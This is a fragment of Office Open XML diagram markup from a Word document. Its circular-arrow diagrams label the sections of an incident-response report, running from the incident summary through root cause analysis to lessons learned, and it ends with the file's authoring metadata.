        <dsp:cNvPr id="5" name="Rectangles 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2481832" y="423350"/>
          <a:ext cx="2219772" cy="693679"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="lt1">
            <a:alpha val="40000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txBody>
        <a:bodyPr lIns="469851" tIns="68580" rIns="68580" bIns="68580" anchor="ctr"/>
        <a:lstStyle>
          <a:lvl1pPr algn="l">
            <a:defRPr sz="1800"/>
          </a:lvl1pPr>
          <a:lvl2pPr marL="114300" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl2pPr>
          <a:lvl3pPr marL="228600" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl3pPr>
          <a:lvl4pPr marL="342900" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl4pPr>
          <a:lvl5pPr marL="457200" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl5pPr>
          <a:lvl6pPr marL="571500" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl6pPr>
          <a:lvl7pPr marL="685800" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl7pPr>
          <a:lvl8pPr marL="800100" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl8pPr>
          <a:lvl9pPr marL="914400" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl9pPr>
        </a:lstStyle>
        <a:p>
          <a:pPr lvl="0" algn="ctr">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Mariam Mohamed Fawzy</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2481832" y="423350"/>
        <a:ext cx="2219772" cy="693679"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5DE53E3E-EFB9-48A2-9A24-F1ED189F369C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="Rectangles 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2389341" y="323152"/>
          <a:ext cx="485575" cy="728363"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1">
            <a:tint val="50000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="2389341" y="323152"/>
        <a:ext cx="485575" cy="728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862995" cy="3167380"/>
        <a:chOff x="0" y="0"/>
        <a:chExt cx="2862995" cy="3167380"/>
      </a:xfrm>
    </dsp:grpSpPr>
    <dsp:sp modelId="{9164192F-A81A-4DA1-B383-F23B6CC842E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="3" name="Circular Arrow 2"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="902644" y="0"/>
          <a:ext cx="1524545" cy="1524777"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 4500000"/>
            <a:gd name="adj4" fmla="val 10800000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="902644" y="0"/>
        <a:ext cx="1524545" cy="1524777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9AB448F7-6BD0-4BB3-B8F7-DB4C19E9CCA4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="Rectangles 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1239618" y="550491"/>
          <a:ext cx="847160" cy="423479"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Incident Summary</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1239618" y="550491"/>
        <a:ext cx="847160" cy="423479"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{07A1B6E6-69FE-41A9-A02D-FC30DA8AA336}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="5" name="Shape 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="479207" y="876097"/>
          <a:ext cx="1524545" cy="1524777"/>
        </a:xfrm>
        <a:prstGeom prst="leftCircularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 6300000"/>
            <a:gd name="adj4" fmla="val 18900000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="479207" y="876097"/>
        <a:ext cx="1524545" cy="1524777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E0A07A2-4A81-424A-8D01-C5962348923E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="Rectangles 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="817899" y="1431656"/>
          <a:ext cx="847160" cy="423479"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>2. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Containment and Eradication</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="817899" y="1431656"/>
        <a:ext cx="847160" cy="423479"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F72DF72C-7704-45A3-BE16-CF86B9BF89F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="7" name="Block Arc 6"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1011151" y="1857035"/>
          <a:ext cx="1309820" cy="1310345"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 13500000"/>
            <a:gd name="adj2" fmla="val 10800000"/>
            <a:gd name="adj3" fmla="val 12740"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="1011151" y="1857035"/>
        <a:ext cx="1309820" cy="1310345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE2197BD-1972-45F6-BACA-5BBDC619BE5C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="8" name="Rectangles 7"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1241622" y="2314088"/>
          <a:ext cx="847160" cy="423479"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>3. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Timeline of Event</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>s</a:t>
          </a:r>
          <a:endParaRPr>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1241622" y="2314088"/>
        <a:ext cx="847160" cy="423479"/>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803301" cy="3101340"/>
        <a:chOff x="0" y="0"/>
        <a:chExt cx="2803301" cy="3101340"/>
      </a:xfrm>
    </dsp:grpSpPr>
    <dsp:sp modelId="{91EA656E-07C2-40DF-A7F1-F41090EA001C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="3" name="Circular Arrow 2"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="881420" y="0"/>
          <a:ext cx="1492758" cy="1492985"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 4500000"/>
            <a:gd name="adj4" fmla="val 10800000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="881420" y="0"/>
        <a:ext cx="1492758" cy="1492985"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="Rectangles 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1211369" y="539013"/>
          <a:ext cx="829497" cy="414649"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="0">
          <a:schemeClr val="dk1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:schemeClr val="lt1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>7. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Lessons Learned</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1211369" y="539013"/>
        <a:ext cx="829497" cy="414649"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34AA66A3-6964-4238-925E-D6F785D69BEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="5" name="Shape 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="466812" y="857831"/>
          <a:ext cx="1492758" cy="1492985"/>
        </a:xfrm>
        <a:prstGeom prst="leftCircularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 6300000"/>
            <a:gd name="adj4" fmla="val 18900000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="466812" y="857831"/>
        <a:ext cx="1492758" cy="1492985"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="Rectangles 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="798442" y="1401806"/>
          <a:ext cx="829497" cy="414649"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="0">
          <a:schemeClr val="dk1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:schemeClr val="lt1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>8. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Summary Report</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798442" y="1401806"/>
        <a:ext cx="829497" cy="414649"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC51DBE4-5110-4D10-A2D3-FC3E1554470E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="7" name="Block Arc 6"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="987665" y="1818316"/>
          <a:ext cx="1282510" cy="1283024"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 13500000"/>
            <a:gd name="adj2" fmla="val 10800000"/>
            <a:gd name="adj3" fmla="val 12740"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="987665" y="1818316"/>
        <a:ext cx="1282510" cy="1283024"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="8" name="Rectangles 7"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1213331" y="2265839"/>
          <a:ext cx="829497" cy="414649"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="0">
          <a:schemeClr val="dk1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:schemeClr val="lt1">
            <a:alpha val="0"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>9. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Review and Improv</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>e</a:t>
          </a:r>
          <a:endParaRPr>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1213331" y="2265839"/>
        <a:ext cx="829497" cy="414649"/>
      </dsp:txXfrm>
    </dsp:sp>
  </dsp:spTree>
</dsp:drawing>
</file>

<file path=word/diagrams/drawing5.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784360" cy="3080385"/>
        <a:chOff x="0" y="0"/>
        <a:chExt cx="2784360" cy="3080385"/>
      </a:xfrm>
    </dsp:grpSpPr>
    <dsp:sp modelId="{7A2944B7-F8B7-4900-8BBD-942FA19DF801}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="3" name="Circular Arrow 2"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1695958" y="0"/>
          <a:ext cx="1482672" cy="1482897"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 4500000"/>
            <a:gd name="adj4" fmla="val 10800000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="1695958" y="0"/>
        <a:ext cx="1482672" cy="1482897"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EAD8C68E-E856-4971-A6C9-58836C912B64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="Rectangles 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2023677" y="535371"/>
          <a:ext cx="823892" cy="411847"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>4. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Recovery</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2023677" y="535371"/>
        <a:ext cx="823892" cy="411847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="5" name="Shape 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1284151" y="852034"/>
          <a:ext cx="1482672" cy="1482897"/>
        </a:xfrm>
        <a:prstGeom prst="leftCircularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 10980"/>
            <a:gd name="adj2" fmla="val 1142322"/>
            <a:gd name="adj3" fmla="val 6300000"/>
            <a:gd name="adj4" fmla="val 18900000"/>
            <a:gd name="adj5" fmla="val 12500"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="1284151" y="852034"/>
        <a:ext cx="1482672" cy="1482897"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{74223A5C-B074-4AB7-8101-B679B264A52B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="Rectangles 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1613541" y="1392334"/>
          <a:ext cx="823892" cy="411847"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>5. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Impact</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1613541" y="1392334"/>
        <a:ext cx="823892" cy="411847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="7" name="Block Arc 6"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1801485" y="1806030"/>
          <a:ext cx="1273845" cy="1274355"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 13500000"/>
            <a:gd name="adj2" fmla="val 10800000"/>
            <a:gd name="adj3" fmla="val 12740"/>
          </a:avLst>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="1801485" y="1806030"/>
        <a:ext cx="1273845" cy="1274355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="8" name="Rectangles 7"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2025626" y="2250529"/>
          <a:ext cx="823892" cy="411847"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>6. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Root Cause Analysis</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2025626" y="2250529"/>
        <a:ext cx="823892" cy="411847"/>
      </dsp:txXfrm>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4938</Words>
  <Characters>28150</Characters>
  <Lines>234</Lines>
  <Paragraphs>66</Paragraphs>
  <TotalTime>62</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>33022</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2024-09-29T23:28:00Z</dcterms:created>
  <dc:creator>hassan madkour</dc:creator>
  <cp:lastModifiedBy>ahmed madkour</cp:lastModifiedBy>
  <cp:lastPrinted>2024-09-29T22:53:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-30T16:46:13Z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F678F33FCD874CD9B64BE3CF31940F14_13</vt:lpwstr>
  </property>
</Properties>
</file>